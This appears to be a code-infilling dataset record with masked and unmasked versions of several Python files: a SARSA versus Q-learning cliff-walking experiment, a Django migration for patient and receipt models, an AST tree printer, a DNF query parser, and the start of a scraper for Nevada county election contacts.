plt.plot(reward[2], label='{} ε = {} '.format(reward[0], reward[1]))
plt.xlabel('Episodes')
plt.ylabel('Sum of rewards during episode')
plt.legend()
plt.show()
plt.savefig('episode_rewards.png')
plot_errors(mistakes_sarsa, mistakes_q_learning)
| from random import random, randint
import numpy as np
import matplotlib.pyplot as plt
from colorama import Fore, Back, Style
from gridworld import q_to_arrow
N_ROWS = 6
N_COLUMNS = 10
class State(object):
def __init__(self, i, j, is_cliff=False, is_goal=False):
self.i = i
self.j = j
self.is_cliff = is_cliff
self.is_goal = is_goal
# north, east, south, west
self.q_values = np.array([0.0, 0.0, 0.0, 0.0])
def __str__(self):
return '({}, {})'.format(self.i, self.j)
def is_terminal(self):
return self.is_goal or self.is_cliff
def get_max_q_index(self):
best_q_values = np.argwhere(self.q_values == np.max(self.q_values))
if len(best_q_values) > 1:
return best_q_values[randint(0, len(best_q_values) - 1)][0]
else:
_max_q = np.argmax(self.q_values)
return _max_q
def get_max_q_value(self):
return np.max(self.q_values)
def initialize_states():
# This is the set of states, all initialised with default values
states = [[State(j, i) for i in range(N_COLUMNS)] for j in range(N_ROWS)]
# make the cliff
for j in range(1, N_COLUMNS - 1):
states[-1][j].is_cliff = True
states[-1][-1].is_goal = True
return states
# The reward function defines what reward I get for transitioning between the first and second state
def reward(s_1, s_2):
if (s_1.is_goal or s_1.is_cliff):
return 0
elif (s_2.is_goal):
return 10
elif (s_2.is_cliff):
return -100
else:
return -1
""" the transition function takes state and action and results in a new state, depending on their attributes. The method takes the whole state-space as an argument (since the transition depends on the attributes of the states in the state-space), which could for example be the "states" matrix from above, the current state s from the state-space (with its attributes), and the current action, which takes the form of a "difference vector. For example, dx = 0, dy = 1 means: Move to the south. dx = -1, dy = 0 means: Move to the left"""
def transition(stsp, s, di, dj):
if (s.is_cliff or s.is_goal):
return s
elif (s.j + dj not in range(N_COLUMNS) or s.i + di not in range(N_ROWS)):
return s
else:
return stsp[s.i + di][s.j + dj]
gamma = 1
learning_rate = 0.01
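# Undiscounted returns (gamma = 1); learning_rate is the TD step size.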
def action_to_diff_vector(action):
if action == 0: # NORTH
return -1, 0
elif action == 1: # EAST
return 0, 1
elif action == 2: # SOUTH
return 1, 0
elif action == 3: # WEST
return 0, -1
def action_to_verbose(action):
if action == 0:
return 'NORTH'
elif action == 1:
return 'EAST'
elif action == 2:
return 'SOUTH'
elif action == 3:
return 'WEST'
def sarsa(state, next_state, action, next_state_action):
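    # On-policy TD target: uses the Q-value of the action actually chosen in
    # the next state (next_state_action).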
return reward(state, next_state), state.q_values[action] +\
learning_rate * (reward(state, next_state) + gamma * next_state.q_values[next_state_action] - state.q_values[action])
def q_learning(state, next_state, action, next_state_action):
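    # Off-policy TD target: uses the greedy (max) Q-value of the next state.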
next_state_q_value = next_state.get_max_q_value()
return reward(state, next_state), state.q_values[action] +\
learning_rate * (reward(state, next_state) + gamma * next_state_q_value - state.q_values[action])
N_STEPS = 10000
METHOD = 'BOTH'
EPSILONS = [0.05, 0.1, 0.25]
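# Exploration rates to compare; with decay = 1 in run_code, each stays constant.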
def run_code(use_q_learning=False, _epsilon=0.01):
states = initialize_states()
decay = 1
min_epsilon = 0.00001
epsilon = _epsilon
episode_rewards = []
mistakes_array = [] # array which tracks error from convergence on each step
for i in range(N_STEPS):
# select a random starting state
current_state = states[N_ROWS-1][0]
# iterate until reaching a terminal state
epsilon = max(min_epsilon, epsilon * decay)
episode_reward = 0
while not current_state.is_terminal():
if random() < epsilon:
next_action = randint(0, 3)
else:
next_action = current_state.get_max_q_index()
di, dj = action_to_diff_vector(next_action)
next_state = transition(states, current_state, di, dj)
if random() < epsilon:
next_state_action = randint(0, 3)
else:
next_state_action = next_state.get_max_q_index()
if use_q_learning:
reward, current_state.q_values[next_action] = q_learning(current_state, next_state, next_action, next_state_action)
else:
reward, current_state.q_values[next_action] = sarsa(current_state, next_state, next_action, next_state_action)
# print(current_state, next_state, action_to_verbose(next_action), di, dj)
episode_reward += reward
current_state = next_state
if len(episode_rewards):
episode_rewards.append(episode_rewards[-1] + episode_reward)
else:
episode_rewards.append(episode_reward)
'''
if (i % 100 == 0):
print(i)
'''
mistakes_array.append(check_accuracy(states))
return np.array(mistakes_array), states, episode_rewards
def check_accuracy(states):
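    # Summed absolute error between the learned max-Q values and the
    # hand-computed optimal value grid below.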
correct_result = np.array([
[-3, -2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 ],
[-2, -1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 ],
[-1, 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ],
[0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 ],
[1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 ],
[0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ],
])
mistakes_delta = 0
for i in range(N_ROWS):
for j in range(N_COLUMNS):
mistakes_delta += abs(correct_result[i][j] - max(states[i][j].q_values))
return mistakes_delta
def plot_errors(mistakes_sarsa, mistakes_q_learning):
plt.gca().invert_yaxis()
legend = []
for mistake_sarsa in mistakes_sarsa:
plt.plot(mistake_sarsa[1])
legend.append(r'SARSA $\epsilon={}$'.format(mistake_sarsa[0]))
for mistake_q_learning in mistakes_q_learning:
plt.plot(mistake_q_learning[1])
legend.append(r'Q-learning $\epsilon={}$'.format(mistake_q_learning[0]))
    plt.grid(axis='y')
plt.legend(legend)
plt.savefig('CLIFF_SARSA_VS_Q_LEARNING_{}.png'.format(N_STEPS))
# plt.show()
def plot_best_q_values_states(states, method, epsilon, PLOTS, fig, ax):
final_grid = np.array([[max(states[i][j].q_values) for j in range(N_COLUMNS)] for i in range(N_ROWS)])
if PLOTS > 2:
ax = ax[PLOTS % 3, 1]
else:
ax = ax[PLOTS, 0]
ax.imshow(final_grid, aspect='auto', cmap='coolwarm')
# fig, ax = plt.subplots()
ax.set_xticks(np.arange(N_COLUMNS))
ax.set_yticks(np.arange(N_ROWS))
ax.set_xticklabels([i for i in range(N_COLUMNS)])
ax.set_yticklabels([i for i in range(N_ROWS)])
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
# Loop over data dimensions and create text annotations.
for i in range(N_ROWS):
for j in range(N_COLUMNS):
text = ax.text(j, i, '{:.2f}'.format(max(states[i][j].q_values)),
ha="center", va="center", color="w")
fig.tight_layout()
    ax.set_title(r"{}; $\epsilon={}$".format(method, epsilon))
    for i in range(N_ROWS):
        str_ = ""
        for j in range(N_COLUMNS):
            str_ += str(int(final_grid[i][j])) + ", "
        print(str_)
PLOTS += 1
# plt.savefig('CLIFF_WALKING: {}-{}-{}.png'.format(N_STEPS, epsilon, method))
# plt.show()
def display_optimal_policy(states, method, epsilon):
print("{}; ε = {}".format(method, epsilon))
print('-' * 60)
for i in range(len(states)):
line_str = ''
for j in range(len(states[0])):
if j == 0:
print('|', end='')
if states[i][j].is_goal:
print(Back.GREEN + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
elif states[i][j].is_cliff:
print(Back.RED + ' ', end='')
print(Style.RESET_ALL + ' | ', end='')
else:
print(' {} | '.format(q_to_arrow(states[i][j].get_max_q_index())), end='')
print(line_str)
print('-' * 60)
if METHOD not in ['Q_LEARNING', 'SARSA', 'BOTH']:
    print('invalid METHOD: must be Q_LEARNING, SARSA or BOTH')
import sys; sys.exit()
mistakes_q_learning = []
mistakes_sarsa = []
PLOTS = 0
fig, axes = plt.subplots(3, 2)
rewards = []
for epsilon in EPSILONS:
if METHOD == 'Q_LEARNING' or METHOD == 'BOTH':
_mistakes_q_learning, end_states_q_learning, episode_rewards = run_code(use_q_learning=True, _epsilon=epsilon)
plot_best_q_values_states(end_states_q_learning, 'Q_LEARNING', epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_q_learning, 'Q LEARNING', epsilon)
mistakes_q_learning.append((epsilon, _mistakes_q_learning))
rewards.append(('Q_LEARNING', epsilon, episode_rewards))
PLOTS += 1
for epsilon in EPSILONS:
if METHOD == 'SARSA' or METHOD == 'BOTH':
_mistakes_sarsa, end_states_sarsa, episode_rewards = run_code(use_q_learning=False, _epsilon=epsilon)
plot_best_q_values_states(end_states_sarsa, 'SARSA', epsilon, PLOTS, fig, axes)
display_optimal_policy(end_states_sarsa, 'SARSA', epsilon)
mistakes_sarsa.append((epsilon, _mistakes_sarsa))
rewards.append(('SARSA', epsilon, episode_rewards))
PLOTS += 1
plt.savefig('all_runs.png')
plt.show()
# for i, j in [(0, 3), (1, 4), (2, 5)]:
for run in rewards:
# plt.plot(rewards[i][2], 'o', label='{} ε = {} '.format(rewards[i][0], rewards[i][1]))
# plt.plot(rewards[j][2], 'o', label='{} ε = {} '.format(rewards[j][0], rewards[j][1]))
    plt.plot(run[2], label='{} ε = {} '.format(run[0], run[1]))
plt.xlabel('Episodes')
plt.ylabel('Sum of rewards during episode')
plt.legend()
plt.savefig('episode_rewards.png')
plt.show()
plot_errors(mistakes_sarsa, mistakes_q_learning)
| [
18,
19,
20,
21,
22
] |
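The cliff-walking row above turns on the difference between the SARSA and Q-learning targets. A minimal, self-contained sketch of the two temporal-difference updates — the learning_rate and gamma values here are hypothetical stand-ins for the globals defined earlier in that file:

# Hypothetical hyperparameters; the original file defines its own globals.
learning_rate, gamma = 0.1, 0.9

def sarsa_update(q, r, q_next_action):
    # On-policy: bootstrap from the value of the action actually chosen next.
    return q + learning_rate * (r + gamma * q_next_action - q)

def q_learning_update(q, r, q_next_max):
    # Off-policy: bootstrap from the greedy (max) next-state value.
    return q + learning_rate * (r + gamma * q_next_max - q)

print(sarsa_update(0.5, -1.0, 0.4))       # ~0.386
print(q_learning_update(0.5, -1.0, 0.7))  # ~0.413

The only difference is the bootstrap term, which is why Q-learning tends to learn the optimal cliff-edge path while SARSA learns the safer detour.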
41 | 52da8608e43b2d8dfe00f0956a1187fcf2e7b1ff | <mask token>
| <mask token>
class Migration(migrations.Migration):
<mask token>
<mask token>
| <mask token>
class Migration(migrations.Migration):
dependencies = [('DHOPD', '0015_auto_20200515_0126')]
operations = [migrations.CreateModel(name='Patient_c', fields=[(
'patient_id', models.AutoField(max_length=200, primary_key=True,
serialize=False)), ('patient_fname', models.CharField(max_length=
200)), ('patient_mname', models.CharField(max_length=200)), (
'patient_lname', models.CharField(max_length=200)), (
'patient_title', models.CharField(max_length=20)), (
'patient_address', models.CharField(max_length=500)), (
'patient_town', models.CharField(max_length=200)), ('patient_phone',
models.CharField(max_length=15)), ('patient_services', models.
CharField(max_length=500)), ('patient_status', models.CharField(
max_length=2)), ('patient_cost', models.CharField(max_length=100)),
('patient_date', models.DateField(default=datetime.date.today)), (
'patient_time', models.TimeField(auto_now_add=True)), (
'patient_comment', models.CharField(max_length=200))]), migrations.
CreateModel(name='Receipt_c', fields=[('receipt_id', models.
AutoField(max_length=200, primary_key=True, serialize=False)), (
'receipt_patient', models.CharField(max_length=200)), (
'receipt_cost', models.CharField(max_length=200)), ('receipt_time',
models.TimeField(auto_now=True)), ('receipt_status', models.
CharField(default='-1', max_length=10))])]
| import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('DHOPD', '0015_auto_20200515_0126')]
operations = [migrations.CreateModel(name='Patient_c', fields=[(
'patient_id', models.AutoField(max_length=200, primary_key=True,
serialize=False)), ('patient_fname', models.CharField(max_length=
200)), ('patient_mname', models.CharField(max_length=200)), (
'patient_lname', models.CharField(max_length=200)), (
'patient_title', models.CharField(max_length=20)), (
'patient_address', models.CharField(max_length=500)), (
'patient_town', models.CharField(max_length=200)), ('patient_phone',
models.CharField(max_length=15)), ('patient_services', models.
CharField(max_length=500)), ('patient_status', models.CharField(
max_length=2)), ('patient_cost', models.CharField(max_length=100)),
('patient_date', models.DateField(default=datetime.date.today)), (
'patient_time', models.TimeField(auto_now_add=True)), (
'patient_comment', models.CharField(max_length=200))]), migrations.
CreateModel(name='Receipt_c', fields=[('receipt_id', models.
AutoField(max_length=200, primary_key=True, serialize=False)), (
'receipt_patient', models.CharField(max_length=200)), (
'receipt_cost', models.CharField(max_length=200)), ('receipt_time',
models.TimeField(auto_now=True)), ('receipt_status', models.
CharField(default='-1', max_length=10))])]
| # Generated by Django 2.2.6 on 2020-05-21 09:44
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('DHOPD', '0015_auto_20200515_0126'),
]
operations = [
migrations.CreateModel(
name='Patient_c',
fields=[
('patient_id', models.AutoField(max_length=200, primary_key=True, serialize=False)),
('patient_fname', models.CharField(max_length=200)),
('patient_mname', models.CharField(max_length=200)),
('patient_lname', models.CharField(max_length=200)),
('patient_title', models.CharField(max_length=20)),
('patient_address', models.CharField(max_length=500)),
('patient_town', models.CharField(max_length=200)),
('patient_phone', models.CharField(max_length=15)),
('patient_services', models.CharField(max_length=500)),
('patient_status', models.CharField(max_length=2)),
('patient_cost', models.CharField(max_length=100)),
('patient_date', models.DateField(default=datetime.date.today)),
('patient_time', models.TimeField(auto_now_add=True)),
('patient_comment', models.CharField(max_length=200)),
],
),
migrations.CreateModel(
name='Receipt_c',
fields=[
('receipt_id', models.AutoField(max_length=200, primary_key=True, serialize=False)),
('receipt_patient', models.CharField(max_length=200)),
('receipt_cost', models.CharField(max_length=200)),
('receipt_time', models.TimeField(auto_now=True)),
('receipt_status', models.CharField(default='-1', max_length=10)),
],
),
]
| [
0,
1,
2,
3,
4
] |
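A sketch of the models.py declaration that would generate the migration above — field names and options are copied from the CreateModel operations, while the module layout and the omission of the (ignored) max_length on AutoField are assumptions:

import datetime
from django.db import models

class Patient_c(models.Model):
    patient_id = models.AutoField(primary_key=True)
    patient_fname = models.CharField(max_length=200)
    patient_mname = models.CharField(max_length=200)
    patient_lname = models.CharField(max_length=200)
    patient_title = models.CharField(max_length=20)
    patient_address = models.CharField(max_length=500)
    patient_town = models.CharField(max_length=200)
    patient_phone = models.CharField(max_length=15)
    patient_services = models.CharField(max_length=500)
    patient_status = models.CharField(max_length=2)
    patient_cost = models.CharField(max_length=100)
    patient_date = models.DateField(default=datetime.date.today)
    patient_time = models.TimeField(auto_now_add=True)
    patient_comment = models.CharField(max_length=200)

class Receipt_c(models.Model):
    receipt_id = models.AutoField(primary_key=True)
    receipt_patient = models.CharField(max_length=200)
    receipt_cost = models.CharField(max_length=200)
    receipt_time = models.TimeField(auto_now=True)
    receipt_status = models.CharField(default='-1', max_length=10)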
42 | 1084478226777b9259274e053984ac34d461198d | <mask token>
class TreePrinter:
<mask token>
<mask token>
<mask token>
@addToClass(Block)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.instructions is not None:
self.instructions.printTree(indent + 1)
@addToClass(Assignment)
def printTree(self, indent=0):
print_intended(self.operator, indent)
self.left.printTree(indent + 1)
self.right.printTree(indent + 1)
@addToClass(For)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.variable.printTree(indent + 1)
self.range.printTree(indent + 1)
self.instruction.printTree(indent + 1)
<mask token>
<mask token>
@addToClass(Print)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.args.printTree(indent + 1)
@addToClass(Return)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.args is not None:
self.args.printTree(indent + 1)
@addToClass(ArrayElement)
def printTree(self, indent=0):
print_intended('get_element', indent)
self.array.printTree(indent + 1)
self.ids.printTree(indent + 1)
@addToClass(Value)
def printTree(self, indent=0):
print_intended(str(self.value), indent)
@addToClass(Array)
def printTree(self, indent=0):
if self.list is not None:
print_intended('array', indent)
self.list.printTree(indent + 1)
else:
print_intended('empty_array', indent)
<mask token>
@addToClass(MatrixFunction)
def printTree(self, indent=0):
print_intended(self.function, indent)
self.parameter.printTree(indent + 1)
@addToClass(UnaryMinus)
def printTree(self, indent=0):
print_intended('-', indent)
self.value.printTree(indent + 1)
@addToClass(Transpose)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.value.printTree(indent + 1)
<mask token>
<mask token>
@addToClass(Range)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.start_value.printTree(indent + 1)
self.end_value.printTree(indent + 1)
<mask token>
| <mask token>
class TreePrinter:
@addToClass(Node)
def printTree(self, indent=0):
raise Exception('printTree not defined in class ' + self.__class__.
__name__)
@addToClass(Instruction)
def printTree(self, indent=0):
print_intended(self.type, indent)
<mask token>
@addToClass(Block)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.instructions is not None:
self.instructions.printTree(indent + 1)
@addToClass(Assignment)
def printTree(self, indent=0):
print_intended(self.operator, indent)
self.left.printTree(indent + 1)
self.right.printTree(indent + 1)
@addToClass(For)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.variable.printTree(indent + 1)
self.range.printTree(indent + 1)
self.instruction.printTree(indent + 1)
<mask token>
<mask token>
@addToClass(Print)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.args.printTree(indent + 1)
@addToClass(Return)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.args is not None:
self.args.printTree(indent + 1)
@addToClass(ArrayElement)
def printTree(self, indent=0):
print_intended('get_element', indent)
self.array.printTree(indent + 1)
self.ids.printTree(indent + 1)
@addToClass(Value)
def printTree(self, indent=0):
print_intended(str(self.value), indent)
@addToClass(Array)
def printTree(self, indent=0):
if self.list is not None:
print_intended('array', indent)
self.list.printTree(indent + 1)
else:
print_intended('empty_array', indent)
<mask token>
@addToClass(MatrixFunction)
def printTree(self, indent=0):
print_intended(self.function, indent)
self.parameter.printTree(indent + 1)
@addToClass(UnaryMinus)
def printTree(self, indent=0):
print_intended('-', indent)
self.value.printTree(indent + 1)
@addToClass(Transpose)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.value.printTree(indent + 1)
@addToClass(Program)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.instructions_opt.printTree(indent + 1)
<mask token>
@addToClass(Range)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.start_value.printTree(indent + 1)
self.end_value.printTree(indent + 1)
@addToClass(List)
def printTree(self, indent=0):
for element in self.elements:
element.printTree(indent)
| <mask token>
class TreePrinter:
@addToClass(Node)
def printTree(self, indent=0):
raise Exception('printTree not defined in class ' + self.__class__.
__name__)
@addToClass(Instruction)
def printTree(self, indent=0):
print_intended(self.type, indent)
<mask token>
@addToClass(Block)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.instructions is not None:
self.instructions.printTree(indent + 1)
@addToClass(Assignment)
def printTree(self, indent=0):
print_intended(self.operator, indent)
self.left.printTree(indent + 1)
self.right.printTree(indent + 1)
@addToClass(For)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.variable.printTree(indent + 1)
self.range.printTree(indent + 1)
self.instruction.printTree(indent + 1)
@addToClass(While)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.condition.printTree(indent + 1)
self.instruction.printTree(indent + 1)
@addToClass(If)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.condition.printTree(indent + 1)
print_intended('then', indent)
self.if_block.printTree(indent + 1)
if self.else_block is not None:
print_intended('else', indent)
self.else_block.printTree(indent + 1)
@addToClass(Print)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.args.printTree(indent + 1)
@addToClass(Return)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.args is not None:
self.args.printTree(indent + 1)
@addToClass(ArrayElement)
def printTree(self, indent=0):
print_intended('get_element', indent)
self.array.printTree(indent + 1)
self.ids.printTree(indent + 1)
@addToClass(Value)
def printTree(self, indent=0):
print_intended(str(self.value), indent)
@addToClass(Array)
def printTree(self, indent=0):
if self.list is not None:
print_intended('array', indent)
self.list.printTree(indent + 1)
else:
print_intended('empty_array', indent)
<mask token>
@addToClass(MatrixFunction)
def printTree(self, indent=0):
print_intended(self.function, indent)
self.parameter.printTree(indent + 1)
@addToClass(UnaryMinus)
def printTree(self, indent=0):
print_intended('-', indent)
self.value.printTree(indent + 1)
@addToClass(Transpose)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.value.printTree(indent + 1)
@addToClass(Program)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.instructions_opt.printTree(indent + 1)
@addToClass(Identifier)
def printTree(self, indent=0):
print_intended(self.name, indent)
@addToClass(Range)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.start_value.printTree(indent + 1)
self.end_value.printTree(indent + 1)
@addToClass(List)
def printTree(self, indent=0):
for element in self.elements:
element.printTree(indent)
| <mask token>
class TreePrinter:
@addToClass(Node)
def printTree(self, indent=0):
raise Exception('printTree not defined in class ' + self.__class__.
__name__)
@addToClass(Instruction)
def printTree(self, indent=0):
print_intended(self.type, indent)
@addToClass(Expression)
def printTree(self, indent=0):
print_intended(self.type, indent)
@addToClass(Block)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.instructions is not None:
self.instructions.printTree(indent + 1)
@addToClass(Assignment)
def printTree(self, indent=0):
print_intended(self.operator, indent)
self.left.printTree(indent + 1)
self.right.printTree(indent + 1)
@addToClass(For)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.variable.printTree(indent + 1)
self.range.printTree(indent + 1)
self.instruction.printTree(indent + 1)
@addToClass(While)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.condition.printTree(indent + 1)
self.instruction.printTree(indent + 1)
@addToClass(If)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.condition.printTree(indent + 1)
print_intended('then', indent)
self.if_block.printTree(indent + 1)
if self.else_block is not None:
print_intended('else', indent)
self.else_block.printTree(indent + 1)
@addToClass(Print)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.args.printTree(indent + 1)
@addToClass(Return)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.args is not None:
self.args.printTree(indent + 1)
@addToClass(ArrayElement)
def printTree(self, indent=0):
print_intended('get_element', indent)
self.array.printTree(indent + 1)
self.ids.printTree(indent + 1)
@addToClass(Value)
def printTree(self, indent=0):
print_intended(str(self.value), indent)
@addToClass(Array)
def printTree(self, indent=0):
if self.list is not None:
print_intended('array', indent)
self.list.printTree(indent + 1)
else:
print_intended('empty_array', indent)
@addToClass(BinaryExpression)
def printTree(self, indent=0):
print_intended(self.operator, indent)
self.left.printTree(indent + 1)
self.right.printTree(indent + 1)
@addToClass(MatrixFunction)
def printTree(self, indent=0):
print_intended(self.function, indent)
self.parameter.printTree(indent + 1)
@addToClass(UnaryMinus)
def printTree(self, indent=0):
print_intended('-', indent)
self.value.printTree(indent + 1)
@addToClass(Transpose)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.value.printTree(indent + 1)
@addToClass(Program)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.instructions_opt.printTree(indent + 1)
@addToClass(Identifier)
def printTree(self, indent=0):
print_intended(self.name, indent)
@addToClass(Range)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.start_value.printTree(indent + 1)
self.end_value.printTree(indent + 1)
@addToClass(List)
def printTree(self, indent=0):
for element in self.elements:
element.printTree(indent)
| from .ast import *
# noinspection PyPep8Naming
def addToClass(cls):
def decorator(func):
setattr(cls, func.__name__, func)
return func
return decorator
def print_intended(to_print, intend):
print(intend * "| " + to_print)
# noinspection PyPep8Naming,PyUnresolvedReferences
class TreePrinter:
# General
@addToClass(Node)
def printTree(self, indent=0):
raise Exception("printTree not defined in class " + self.__class__.__name__)
@addToClass(Instruction)
def printTree(self, indent=0):
print_intended(self.type, indent)
@addToClass(Expression)
def printTree(self, indent=0):
print_intended(self.type, indent)
# Instructions
@addToClass(Block)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.instructions is not None:
self.instructions.printTree(indent + 1)
@addToClass(Assignment)
def printTree(self, indent=0):
print_intended(self.operator, indent)
self.left.printTree(indent + 1)
self.right.printTree(indent + 1)
@addToClass(For)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.variable.printTree(indent + 1)
self.range.printTree(indent + 1)
self.instruction.printTree(indent + 1)
@addToClass(While)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.condition.printTree(indent + 1)
self.instruction.printTree(indent + 1)
@addToClass(If)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.condition.printTree(indent + 1)
print_intended('then', indent)
self.if_block.printTree(indent + 1)
if self.else_block is not None:
print_intended('else', indent)
self.else_block.printTree(indent + 1)
@addToClass(Print)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.args.printTree(indent + 1)
@addToClass(Return)
def printTree(self, indent=0):
print_intended(self.type, indent)
if self.args is not None:
self.args.printTree(indent + 1)
@addToClass(ArrayElement)
def printTree(self, indent=0):
print_intended("get_element", indent)
self.array.printTree(indent + 1)
self.ids.printTree(indent + 1)
# Expressions
@addToClass(Value)
def printTree(self, indent=0):
print_intended(str(self.value), indent)
@addToClass(Array)
def printTree(self, indent=0):
if self.list is not None:
print_intended('array', indent)
self.list.printTree(indent + 1)
else:
print_intended('empty_array', indent)
@addToClass(BinaryExpression)
def printTree(self, indent=0):
print_intended(self.operator, indent)
self.left.printTree(indent + 1)
self.right.printTree(indent + 1)
@addToClass(MatrixFunction)
def printTree(self, indent=0):
print_intended(self.function, indent)
self.parameter.printTree(indent + 1)
@addToClass(UnaryMinus)
def printTree(self, indent=0):
print_intended('-', indent)
self.value.printTree(indent + 1)
@addToClass(Transpose)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.value.printTree(indent + 1)
# Other
@addToClass(Program)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.instructions_opt.printTree(indent + 1)
@addToClass(Identifier)
def printTree(self, indent=0):
print_intended(self.name, indent)
@addToClass(Range)
def printTree(self, indent=0):
print_intended(self.type, indent)
self.start_value.printTree(indent + 1)
self.end_value.printTree(indent + 1)
@addToClass(List)
def printTree(self, indent=0):
for element in self.elements:
element.printTree(indent)
| [
13,
17,
20,
22,
26
] |
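The printers above rely on addToClass to monkey-patch a printTree method onto each AST node class. A self-contained illustration of the pattern with a hypothetical Num node:

def addToClass(cls):
    def decorator(func):
        # Attach the decorated function to the class as a regular method.
        setattr(cls, func.__name__, func)
        return func
    return decorator

class Num:
    def __init__(self, value):
        self.value = value

@addToClass(Num)
def printTree(self, indent=0):
    # Same indentation convention as print_intended above.
    print(indent * "| " + str(self.value))

Num(7).printTree(2)  # prints: | | 7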
43 | 999de0965efa3c1fe021142a105dcf28184cd5ba | <mask token>
| <mask token>
def parse(query):
print('parsing the query...')
query = dnf_converter.convert(query)
cp_clause_list = []
clause_list = []
for cp in query['$or']:
clauses = []
if '$and' in cp:
for clause in cp['$and']:
clauses.append(clause)
clause_list.append(clause)
else:
clause = cp
clauses.append(clause)
clause_list.append(clause)
cp_clause_list.append({'cp': cp, 'clauses': clauses})
return cp_clause_list, clause_list
| import dnf_converter
def parse(query):
print('parsing the query...')
query = dnf_converter.convert(query)
cp_clause_list = []
clause_list = []
for cp in query['$or']:
clauses = []
if '$and' in cp:
for clause in cp['$and']:
clauses.append(clause)
clause_list.append(clause)
else:
clause = cp
clauses.append(clause)
clause_list.append(clause)
cp_clause_list.append({'cp': cp, 'clauses': clauses})
return cp_clause_list, clause_list
| import dnf_converter
def parse(query):
print("parsing the query...")
query = dnf_converter.convert(query)
cp_clause_list = []
clause_list = []
for cp in query["$or"]:
clauses = []
if "$and" in cp:
for clause in cp["$and"]:
clauses.append(clause)
clause_list.append(clause)
else:
clause = cp
clauses.append(clause)
clause_list.append(clause)
cp_clause_list.append({ "cp": cp, "clauses": clauses })
return cp_clause_list, clause_list | null | [
0,
1,
2,
3
] |
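Assuming dnf_converter.convert leaves an already-DNF query unchanged (an assumption — that module is not shown here), parse splits the query into its conjunctive products and the flat clause list:

query = {'$or': [
    {'$and': [{'a': 1}, {'b': {'$gt': 2}}]},
    {'c': 3},
]}
cp_clause_list, clause_list = parse(query)
# cp_clause_list -> [{'cp': {'$and': [...]}, 'clauses': [{'a': 1}, {'b': {'$gt': 2}}]},
#                    {'cp': {'c': 3}, 'clauses': [{'c': 3}]}]
# clause_list    -> [{'a': 1}, {'b': {'$gt': 2}}, {'c': 3}]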
44 | cb08f64d1ad7e53f1041684d4ca4ef65036c138d | <mask token>
class ElemIterator:
<mask token>
def peek(self):
try:
return self.els[self.i]
except IndexError:
return None
def __next__(self):
self.i += 1
return self.els[self.i - 1]
def hasNext(self):
return len(self.els) > self.i
<mask token>
<mask token>
<mask token>
| <mask token>
def is_element(el, tag):
return isinstance(el, Tag) and el.name == tag
class ElemIterator:
def __init__(self, els):
self.els = els
self.i = 0
def peek(self):
try:
return self.els[self.i]
except IndexError:
return None
def __next__(self):
self.i += 1
return self.els[self.i - 1]
def hasNext(self):
return len(self.els) > self.i
def peek_till(self, tag):
while not is_element(self.peek(), tag):
self.__next__()
def next_till(self, tag):
self.peek_till(tag)
self.__next__()
def parse_lines(iter_):
iter_.peek_till('strong')
county = []
while iter_.hasNext():
county += [iter_.__next__()]
if is_element(iter_.peek(), 'strong'):
yield ElemIterator(county)
county = []
yield ElemIterator(county)
county = []
<mask token>
def parse_url(iter_):
iter_.peek_till('a')
link = iter_.__next__()
href = link['href']
assert not href.startswith('mailto:')
return [href]
def parse_county(iter_):
county_title = iter_.__next__().text.strip().title()
locale = re.match('(.*) (City|County)', county_title).group(0)
if county_title.startswith('Clark County Elections Mailing Address'):
emails, url = parse_emails_url(iter_)
return {'locale': locale, 'county': locale, 'emails': emails}
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
if 'Clerk' in el or 'Registrar' in el:
official = el.strip().split(',')[0]
break
address = []
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
address += [el.strip()]
if re.search('Nevada \\d{5}', el) or re.search('NV \\d{5}', el):
break
el = iter_.__next__()
el = iter_.__next__()
if isinstance(el, NavigableString):
el = el.replace(u'\xa0', ' ')
matches1 = re.search(
